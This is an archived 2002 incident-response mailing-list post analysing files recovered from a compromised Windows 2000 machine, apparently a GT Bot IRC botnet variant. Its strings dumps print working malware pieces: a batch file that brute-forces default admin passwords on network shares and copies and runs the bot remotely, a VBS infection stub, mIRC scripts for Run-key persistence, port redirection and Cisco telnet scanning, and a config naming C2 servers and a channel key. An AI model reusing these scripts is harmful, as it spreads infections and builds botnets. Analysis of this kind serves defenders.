W2K Compromise "Share Scan" - Infectx"IP Address".vbs

Patrick Nolan pnolan01 at nycap.rr.com
Wed Oct 9 15:15:55 GMT 2002


Hi folks, what follows is the original post, reduced and resent to Unisog:

xxxxxxxxxxxxxxxxxxxxxxxxxx

Hello woofz,

Interesting post, thanks for sending it. I downloaded http://lightning.prohosting.com/~woof/temp/wserver.zip , "the files found in a compromised Win2000 Pro. machine".

I submitted the files to SARC and two trojan-detection vendors, since they were not detected as a trojan by the two scans I ran, which included current definitions for variants of "IRC GTBot/Aristotles Trojan".

FWIW, I ran strings over the files and copied the parts of interest to me below; I tried to put the first few in the order in which they are used. When I hear back from the vendors I'll let you know what they say.

Regards,

Pat

\wserver\Winnt\system32\Infect217.121.100.126.vbs

00000000   00000000      0   on error resume next
00000016   00000016      0   Set fso = CreateObject("Scripting.FileSystemObject")
0000004C   0000004C      0   windows = fso.GetSpecialFolder(WindowsFolder)
0000007B   0000007B      0   Set src3 = CreateObject("Wscript.shell")
000000A5   000000A5      0   src3.run "share.bat 217.121.100.126",0,true

\wserver\Winnt\system32\share.bat
00000000   00000000      0   net use \\%1\C$ "" "/user:Administrator"
0000002A   0000002A      0   net use \\%1\C$ "administrator" "/user:Administrator"
00000061   00000061      0   net use \\%1\C$ "admin" "/user:Administrator"
00000090   00000090      0   net use \\%1\C$ "" "/user:Admin"
000000B2   000000B2      0   net use \\%1\C$ "admin" "/user:Admin"
000000D9   000000D9      0   net use \\%1\C$ "administrator" "/user:Admin"
00000108   00000108      0   md \\%1\C$\Drivers
0000011C   0000011C      0   copy iserver.bat \\%1\C$\Drivers
0000013E   0000013E      0   copy wserver.exe \\%1\C$\Drivers
00000160   00000160      0   ntcmd \\%1 -u:Administrator -p: < skill.vxd
0000018D   0000018D      0   ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
000001C7   000001C7      0   ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
000001F9   000001F9      0   ntcmd \\%1 -u:Admin -p: < skill.vxd
0000021E   0000021E      0   ntcmd \\%1 -u:Admin -p:admin < skill.vxd
00000248   00000248      0   ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
0000027A   0000027A      0   net use \\%1\C$ /del

\wserver\Winnt\system32\share.dat
**snip**
00000460   00000460      0       msg %chan Share Scan in Progress (Range) $longip(%NTServerScanCurrentIP) -> $longip(%NTServerScanEndIP)
**snip**
00000A8A   00000A8A      0       msg %chan Share Scan Complete (Range) $longip(%NTServerScanStartIp) -> $longip(%NTServerScanEndIp)
**snip**
00000CBA   00000CBA      0     msg %chan Share Scan Found (Amount) %skill
00000CE8   00000CE8      0     write Infect $+ $sock($sockname).ip $+ .vbs on error resume next
00000D2C   00000D2C      0     write Infect $+ $sock($sockname).ip $+ .vbs Set fso = CreateObject("Scripting.FileSystemObject")
00000D90   00000D90      0     write Infect $+ $sock($sockname).ip $+ .vbs windows = fso.GetSpecialFolder(WindowsFolder)
00000DED   00000DED      0     write Infect $+ $sock($sockname).ip $+ .vbs Set src3 = CreateObject("Wscript.shell")
00000E45   00000E45      0     write Infect $+ $sock($sockname).ip $+ .vbs src3.run "share.bat $sock($sockname).ip $+ ",0,true
00000EA8   00000EA8      0     timer 1 600 remove Infect $+ $sock($sockname).ip $+ .vbs
00000EE4   00000EE4      0     run Infect $+ $sock($sockname).ip $+ .vbs
00000F11   00000F11      0     sockclose $sockname

\wserver\Drivers\iserver.bat
00000000   00000000      0   net start systask

\wserver\Drivers\wserver.exe
**snip**
00043614   00443614      0   3Do you want to extract the files from this archive?
00043715   00443715      0   My Application
00043815   00443815      0   Please enter the password:
00043A14   00443A14      0   +The files have been installed successfully.
00043B14   00443B14      0   (Please wait while setup is installing...
00043C15   00443C15      0   %windowssystem%\aliases.ini
00043E14   00443E14      0   ;Please select a folder where you wish to install the files:
00044015   00444015      0   Setup
00044115   00444115      0   %windowssystem%\Explored.exe
00044415   00444415      0   %windowssystem%\
00044514   00444514      0   TPlease read the following License Agreement. Agree with YES or cancel Setup with NO.
00044615   00444615      0   GWA98
00044714   00444714      0   8Type or load a License Text here... (max. 2040 chars)
00045015   00445015      0   &Cancel
0004502E   0044502E      0    &Continue
0004507D   0044507D      0   uninstall.uni
000451A7   004451A7      0   %windowssystem%\aliases.ini
000452C6   004452C6      0   %windowssystem%\bnc.mrc
000453E5   004453E5      0   %windowssystem%\cscan.dat
00045504   00445504      0   %windowssystem%\download.ini
00045623   00445623      0   %windowssystem%\Explored.exe
00045742   00445742      0   %windowssystem%\ie6.dat
00045861   00445861      0   %windowssystem%\kernel33.exe
00045980   00445980      0   %windowssystem%\mirc.ini
00045A9F   00445A9F      0   %windowssystem%\moo.dll
00045BBE   00445BBE      0   %windowssystem%\remote.ini
00045CDD   00445CDD      0   %windowssystem%\webget.mrc
00045DFC   00445DFC      0   %windowssystem%\winboot.bin
00045F1B   00445F1B      0   %windowssystem%\wincfg
0004603A   0044603A      0   %windowssystem%\winconf.dat
00046159   00446159      0   %windowssystem%\winconf.mrc
00046272   00446272      0   temp exit files
000462A2   004462A2      0   %appfolder%\temp.exe
000462E2   004462E2      0   %appfolder%

\wserver\Winnt\system32\skill.vxd
00000000   00000000      0   c:\Drivers\wserver.exe

\wserver\Winnt\system32\aliases.ini

00000000   00000000      0   [aliases]
0000000B   0000000B      0   n0=recon server irc02.icq.com:6667 orderpass12
0000003B   0000003B      0   n1=b00t set 206.reg

\wserver\Winnt\system32\Explored.exe
too long to snip

\wserver\Winnt\system32\kernel33.exe.bak
**snips**
00004BFA   004905FA      0   FileVersion
00004C26   00490626      0   InternalName
00004C40   00490640      0   HideWindow
00004C5E   0049065E      0   LegalCopyright
00004C92   00490692      0    1996 Adrian Lopez; All rights reserved.
00004CEE   004906EE      0   OriginalFilename
00004D10   00490710      0   hidewndw.exe
00004D32   00490732      0   VarFileInfo
00004D52   00490752      0   Translation

\wserver\Winnt\system32\winconf.mrc
**snips**
00000000   00000000      0   on *:START:{
0000000E   0000000E      0     if ($exists(kernel33.exe) == $false) { /quit 
00000040   00000040      0   rror/Missing File ( $+ $ip $+ ) (hide.exe (hide not detected! quitting)) | /exit }
00000094   00000094      0     elseif ($exists(kernel33.exe) == $true) {
000000C1   000000C1      0       if ($appstate != hidden) { run kernel33.exe /c /fh mirc }
00000100   00000100      0       set %mircdir $replace($mircexe,\,\\)
0000012A   0000012A      0       set %filetoboot $rand(100,999) $+ .reg
00000156   00000156      0       write %filetoboot REGEDIT4
00000176   00000176      0       write %filetoboot [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
000001D0   000001D0      0       write %filetoboot $+("WinUpdate"=",%mircdir,")
00000204   00000204      0       .run -n regedit /s %filetoboot
00000228   00000228      0       .timer 1 4 remove %filetoboot
0000024B   0000024B      0       .timer 1 5 unset %filetoboot
0000026D   0000026D      0       .timer 1 6 unset %mircdir
0000028C   0000028C      0       .run kernel33.exe /c /fh mirc
000002AF   000002AF      0       .identd on $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)
00000302   00000302      0       .server $readini(ie6.dat, start, server) $+ : $+ $readini(ie6.dat, start, serverport) $readini(ie6.dat, start, serverpass)
00000382   00000382      0       .nick Owned[ $+ $rand(0,99999) $+ ]
000003AB   000003AB      0       .fullname $rand(a,z) $+ $rand(a,z) $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(0,10000)
0000040E   0000040E      0       ;rv change
0000041E   0000041E      0       if ($hget(_systemtble)) hfree _systemtble
0000044D   0000044D      0       hadd -m _systemtble rec $+ $readini(ie6.dat, start, server) $true
00000494   00000494      0       hadd _systemtble $readini(ie6.dat, start, server) $true
000004D1   000004D1      0       ;rv change
000004E3   000004E3      0       if (%runonce == ON) && ($portfree(9000) == $false) { exit } 
00000525   00000525      0       if (%runonce == ON) && ($portfree(9000) == $true) { /socklisten blah 9000 }
00000580   00000580      0   on *:CONNECT:{
00000590   00000590      0     .mode $me +ix
000005A1   000005A1      0     .join $readini(ie6.dat, connect, chan) $readini(ie6.dat, connect, chankey)
000005F1   000005F1      0     ;rv change
000005FF   000005FF      0     hadd _systemtble rec $+ $server $false
0000062B   0000062B      0     if (!$hget(_systemtble,$server)) hadd _systemtble $server $true
0000066E   0000066E      0     ;rv change
00000681   00000681      0   on 1:DISCONNECT:{
00000694   00000694      0     ;rv change
000007E4   000007E4      0   on *:JOIN:*:{
000007F3   000007F3      0     ;rv change
00000801   00000801      0     hadd -m _systemtble rec $+ $server $null
0000082D   0000082D      0     ;rv change
0000083B   0000083B      0     if ($nick != $me) && (trial-irc !isin $nick) { whois $nick }
0000087B   0000087B      0     if ($chan == $readini(ie6.dat, connect, chan)) && ($nick == $me) {
000008C1   000008C1      0       .msg $chan 
000008D3   000008D3      0   Online: $host $+ / $+ $ip $fulldate $+ 
00000904   00000904      0   on *:text:.login*:*:{
0000091B   0000091B      0     if ($nick isop $chan) {
00000936   00000936      0       if (!$2) { halt }
0000094D   0000094D      0       if ($2 == $readini(winconf.dat, logins, $nick)) { 
00000985   00000985      0         echo -a in!
00000998   00000998      0         .msg $chan Login Accepted for ( $+ $nick $+ ).
000009CE   000009CE      0         .guser 10 $nick
000009E5   000009E5      0         else if ($level($address($nick,10)) != $Null) { .msg $chan $nick is already logged in. }
00000D92   00000D92      0   on 1:INPUT:*:/msg $readini(ie6.dat, connect, chan) WARNING: User Typing at Local Console - BOTNET EXE NOT HIDDEN!  - EXITING! %logo | exit
00000ED7   00000ED7      0     /msg $readini(ie6.dat, connect, chan) WARNING: Client Killed By Local User! %logo 
00000F3E   00000F3E      0   on 1:KEYDOWN:*:*:/msg $readini(ie6.dat, connect, chan) WARNING: User Typing at Local Console - BOTNET EXE NOT HIDDEN!  - EXITING! %logo | exit
00000FCE   00000FCE      0   on *:socklisten:gtportdirect*:{  set %gtsocknum 0 | :loop |  inc %gtsocknum 1 |  if $sock(gtin*,$calc($sock(gtin*,0) + %gtsocknum ) ) != $null { goto loop } |  set %gtdone $gettok($sockname,2,46) $+ . $+ $calc($sock(gtin*,0) + %gtsocknum ) | sockaccept gtin $+ . $+ %gtdone | sockopen gtout $+ . $+ %gtdone $gettok($sock($Sockname).mark,1,32) $gettok($sock($Sockname).mark,2,32) | unset %gtdone %gtsocknum }
00001167   00001167      0   on *:Sockread:gtin*: {  if ($sockerr > 0) return | :nextread | sockread [ %gtinfotem [ $+ [ $sockname ] ] ] | if [ %gtinfotem [ $+ [ $sockname ] ] ] = $null { return } | if $sock( [ gtout [ $+ [ $remove($sockname,gtin) ] ] ] ).status != active { inc %gtscatchnum 1 | set %gtempr $+ $right($sockname,$calc($len($sockname) - 4) ) $+ %gtscatchnum [ %gtinfotem [ $+ [ $sockname ] ] ] | return } | sockwrite -n [ gtout [ $+ [ $remove($sockname,gtin) ] ] ] [ %gtinfotem [ $+ [ $sockname ] ] ] | unset [ %gtinfotem [ $+ [ $sockname ] ] ] | if ($sockbr == 0) return | goto nextread } 
000013A9   000013A9      0   on *:Sockread:gtout*: {  if ($sockerr > 0) return | :nextread | sockread [ %gtouttemp [ $+ [ $sockname ] ] ] |  if [ %gtouttemp [ $+ [ $sockname ] ] ] = $null { return } | sockwrite -n [ gtin [ $+ [ $remove($sockname,gtout) ] ] ] [ %gtouttemp [ $+ [ $sockname ] ] ] | unset [ %gtouttemp [ $+ [ $sockname ] ] ] | if ($sockbr == 0) return | goto nextread } 
0000150E   0000150E      0   on *:Sockopen:gtout*: {  if ($sockerr > 0) return | set %gttempvar 0 | :stupidloop | inc %gttempvar 1 | if %gtempr  [ $+ [ $right($sockname,$calc($len($sockname) - 5) ) ] $+ [ %gttempvar ] ] != $null { sockwrite -n $sockname %gtempr [ $+ [ $right($sockname,$calc($len($sockname) - 5) ) ] $+ [ %gttempvar  ] ] |  goto stupidloop  } | else { unset %gtempr | unset %gtscatchnum | unset %gtempr* } }
0000169B   0000169B      0   on *:sockclose:gtout*: { unset %gtempr* | sockclose gtin $+ $right($sockname,$calc($len($sockname) - 5) ) | unset %gtscatchnum | sockclose $sockname }
00001733   00001733      0   on *:sockclose:gtin*: {   unset %gtempr* | sockclose gtout $+ $right($sockname,$calc($len($sockname) - 4) ) | unset %gtscatchnum  | sockclose $sockname }
000017CE   000017CE      0   alias predirectstats { set %gtpcount 0 | :startloophere | inc %gtpcount 1 |  if $sock(gtportdirect*,%gtpcount) != $null { /msg $chan Local Host/Port: /server $ip $+ : $+ $gettok($sock(gtportdirect*,%gtpcount),2,46) Remote Host/Port: $gettok($sock(gtportdirect*,%gtpcount).mark,1,32) $+ : $+ $gettok($sock(gtportdirect*,%gtpcount).mark,2,32)  | goto startloophere  } | else { if %gtpcount = 1 { //msg $chan No port redirects added! } | //msg $chan [End of Redirectional Status List] | unset %gtpcount } }
000019C7   000019C7      0   alias pdirectstop { Set %gtrdstoppnum $1 | sockclose [ gtportdirect. [ $+ [ %gtrdstoppnum ] ] ]  | sockclose [ gtin. [ $+ [ %gtrdstoppnum ] ] ] $+ *  | sockclose [ gtout. [ $+ [ %gtrdstoppnum ] ] ] $+ *  | unset %gtrdstoppnum } 
00001AAD   00001AAD      0   alias gtportdirect { if $3 = $null { return } | socklisten gtportdirect $+ . $+ $1 $1 | sockmark gtportdirect $+ . $+ $1 $2 $3 }
00001B33   00001B33      0   ctcp &*:*:{ 
00001B41   00001B41      0     .NOTICE $nick microb0t by microtech 
00001B6C   00001B6C      0   on 10:text:*:*:{

\wserver\Winnt\system32\mirc.ini
00000000   00000000      0   [text]
00000008   00000008      0   commandchar=/
00000017   00000017      0   linesep=-
00000022   00000022      0   timestamp=[HH:nn]
00000035   00000035      0   accept=*.bmp,*.gif,*.jpg,*.log,*.mid,*.mp3,*.ogg,*.png,*.txt,*.wav,*.wma,*.zip
00000085   00000085      0   network=All
00000092   00000092      0   ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
000000F3   000000F3      0   [warn]
000000FB   000000FB      0   fserve=off
00000107   00000107      0   dcc=off
00000110   00000110      0   [options]
0000011B   0000011B      0   n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,1,0,2,0,0,4096,0,1,0,0,0,0,1,0,50,0,1
00000165   00000165      0   n1=5,100,0,0,0,0,0,0,3,1,1,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
000001AD   000001AD      0   n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
000001FA   000001FA      0   n3=5000,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,0,1,1,3,17,0,0,0,3,180
00000246   00000246      0   n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,9999,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
0000029B   0000029B      0   n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,0,26,0,0,0,8192,1,0,0,82
000002EB   000002EB      0   n6=0,0,11,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,100,1,1,0,0,1,0,0,4,1,0
00000334   00000334      0   n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,0,1,1,1,1,0,0,0,0,1,1,0
0000037B   0000037B      0   [about]
00000384   00000384      0   version=6.01
00000392   00000392      0   show=BR26354
000003A0   000003A0      0   [dirs]
000003A8   000003A8      0   [pfiles]
000003B2   000003B2      0   n0=popups.ini
000003C1   000003C1      0   n1=popups.ini
000003D0   000003D0      0   n2=popups.ini
000003DF   000003DF      0   n3=popups.ini
000003EE   000003EE      0   n4=popups.ini
000003FD   000003FD      0   [files]
00000406   00000406      0   servers=servers.ini
0000041B   0000041B      0   browser=C:\Program Files\Internet Explorer\iexplore.exe
00000454   00000454      0   emailer=C:\Program Files\Outlook Express\msimn.exe
00000488   00000488      0   finger=finger.txt
0000049B   0000049B      0   urls=urls.ini
000004AA   000004AA      0   addrbk=addrbk.ini
000004BD   000004BD      0   [windows]
000004C8   000004C8      0   scripts=29,985,-7,703,0,0,0
000004E5   000004E5      0   main=0,112,0,27,2,1,0
000004FC   000004FC      0   wchannel=0,532,0,347,0,1,0
00000518   00000518      0   wserv=0,563,0,409,1,1,0
00000531   00000531      0   wdccs=-1,269,-1,271,0,1,0
0000054C   0000054C      0   wquery=84,563,84,409,1,1,0
00000568   00000568      0   wdccg=-1,269,-1,271,0,1,0
00000583   00000583      0   [ports]
0000058C   0000058C      0   random=off
00000598   00000598      0   bind=off
000005A2   000005A2      0   [ident]
000005AB   000005AB      0   active=yes
000005B7   000005B7      0   userid=uicdk
000005C5   000005C5      0   system=UNIX
000005D2   000005D2      0   port=113
000005DC   000005DC      0   [socks]
000005E5   000005E5      0   enabled=no
000005F1   000005F1      0   port=1080
000005FC   000005FC      0   method=4
00000606   00000606      0   dccs=no
0000060F   0000060F      0   useip=yes
0000061A   0000061A      0   [language]
**snip**

\wserver\Winnt\system32\cscan.dat
00000000   00000000      0   on 10:text:.ciscoscan*:*:{  
0000001E   0000001E      0     if ($2 == start) {
00000034   00000034      0       if ($4 == $null) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
00000080   00000080      0       if ($3 < 167772160) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
000000CF   000000CF      0       if ($4 < 167772160) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
0000011E   0000011E      0       if ($3 > 4294967294) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
0000016E   0000016E      0       if ($4 > 4294967294) { .msg $chan [ciscoscan] IP ranges invalid. | .halt }
000001BE   000001BE      0       if ($5 != $me) { halt }
000001DB   000001DB      0       else {
000001E7   000001E7      0         .set %range0 $3
000001FE   000001FE      0         .set %range1 $3
00000215   00000215      0         .set %range2 $4
0000022C   0000022C      0         .set %chan $chan
00000244   00000244      0         .timerc1 0 2 /range1
00000260   00000260      0         .timerc2 0 2 /range1
0000027C   0000027C      0         .timerc3 0 2 /range1
00000298   00000298      0         .timerc4 0 2 /range1
000002B4   000002B4      0         .timerc5 0 2 /range1
000002D0   000002D0      0         .msg $chan Started scanning $longip($3) -> $longip($4)
0000030E   0000030E      0       }
0000031A   0000031A      0     if ($2 == stop) { .timerc* off | .sockclose c* | .msg $chan [ciscoscan] Stopped scan of $longip(%range0) -> $longip(%range2) on $longip(%range1) }
000003B0   000003B0      0     if ($2 == status) { if ($timer(c1) == $null) { .msg $readini(ie6.dat, connect, chan) [ciscoscan] Not running | .halt } | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Currently scanning: $longip(%range0) -> $longip(%range2) Currently on: $longip(%range1) }
000004B8   000004B8      0     if ($2 == send) { .var %file $ip $+ $rand(1,999) $+ .txt | .copy ciscos.txt %file | .timerdccsend 1 2 /dcc send $nick %file | .timerdccremove 1 120 /remove %file | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Now sending %file to $nick $+ ... }
000005B8   000005B8      0   on 1:sockread:c*:{
000005CC   000005CC      0     if ($sockerr > 0) return
000005E8   000005E8      0     :nextread
000005F5   000005F5      0     sockread %temp
00000607   00000607      0     if ($sockbr == 0) return
00000623   00000623      0     if (%temp == $null) %temp = -
00000644   00000644      0     if (*User*Access*Verification* iswm %temp) { .write ciscos.txt $sock($sockname).ip | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Found cisco! Total ciscos on this machine: $lines(ciscos.txt) }
0000070E   0000070E      0     goto nextread
00000722   00000722      0   Alias range1 { /sockopen c $+ $rand(100000,999999) $range 23 }
00000762   00000762      0   Alias range {
00000771   00000771      0     if (%range1 == %range2) { .sockclose c* | .timerc* off | .msg $readini(ie6.dat, connect, chan) [ciscoscan] Finished scan of $longip(%range0) -> $longip(%range2) }
00000817   00000817      0     else { .inc %range1 | .return $longip(%range1) }

\wserver\Winnt\system32\ie6.dat
00000000   00000000      0   [start]
00000009   00000009      0   server=itg.kicks-ass.net
00000023   00000023      0   server2=itg.kicks-ass.org
0000003E   0000003E      0   serverport=6667
0000004F   0000004F      0   serverpass=nopass
00000062   00000062      0   server2port=6667
00000074   00000074      0   server2pass=nopass
0000008A   0000008A      0   [connect]
00000095   00000095      0   chan=#imaowned
000000A5   000000A5      0   chan2=#imaowned
000000B6   000000B6      0   chankey=0wn3d
000000C5   000000C5      0   chan2key=0wn3d

\wserver\Winnt\system32\remote.ini

00000000   00000000      0   [users]
00000009   00000009      0   n0=50:Mohra-Demon!*smsjy at unknown.cable.wanadoo.nl
0000003E   0000003E      0   [variables]
0000004B   0000004B      0   n0=%gttempvar 1
0000005C   0000005C      0   n1=%gtsocknum 1
0000006D   0000006D      0   n2=%gtdone 777.502
00000081   00000081      0   n3=%packetsentrecord 0
00000099   00000099      0   n4=%streamedrecord 0
000000AF   000000AF      0   n5=%flserv twisted.ma.us.dal.net
000000D1   000000D1      0   n6=%flport 6667
000000E2   000000E2      0   n7=%flchan #externet
000000F8   000000F8      0   n8=%loadscript on
0000010B   0000010B      0   n9=%run on
00000117   00000117      0   n10=%w.g.# #microb0ts
0000012E   0000012E      0   n11=%dlpage www.cube-hacking.net
00000150   00000150      0   n12=%dlfile /lists/proxies.txt
00000170   00000170      0   n13=%chan #!#fifa
00000183   00000183      0   n14=%range0 2897543168
0000019B   0000019B      0   n15=%range1 2897543241
000001B3   000001B3      0   n16=%range2 2897608703
000001CB   000001CB      0   n17=%i 2718
000001D8   000001D8      0   n18=%wget.9069 www.freeserve.com
000001FA   000001FA      0   n19=%wget.9069.write no
00000213   00000213      0   n20=%wget.9069.file www.freeserve.com
0000023A   0000023A      0   n21=%trans.dl
00000249   00000249      0   n22=%runonce on
0000025A   0000025A      0   n23=%fnet tiscali.dal.net
00000275   00000275      0   n24=%fport 6661
00000286   00000286      0   n25=%fchan #roadkill
0000029C   0000029C      0   n26=%NTServerScanStartIp 4225761280
000002C1   000002C1      0   n27=%NTServerScanCurrentIp 4225787922
000002E8   000002E8      0   n28=%NTServerScanEndIp 4225826815
0000030B   0000030B      0   n29=%mircdir C:\\WINNT\\System32\\Explored.exe
0000033B   0000033B      0   n30=%filetoboot 361.reg

\wserver\Winnt\system32\download.ini
00000000   00000000      0   n0=on *:sockopen:range.*:{ if ($sock($sockname).status == 
**rest snipped for Unisog size limit**

----- Original Message ----- 
From: <woofz at gmx.net>
To: <incidents at securityfocus.com>
Sent: Tuesday, October 08, 2002 7:40 PM
Subject: Re: W2K Compromise - PipeCmdSrv


> In-Reply-To: <20021008001826.2454.qmail at mail.securityfocus.com>
> 
> Finally found that my payload is related to the IRC GTBot/Aristotles Trojan
> horse virus, a GT Bot Aurora.d variant I guess, which comes with the same
> explored.exe file.
> 
> More info at http://golcor.tripod.com/gtbot.htm , and I have alerted the author
> there about our message thread here.
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
>


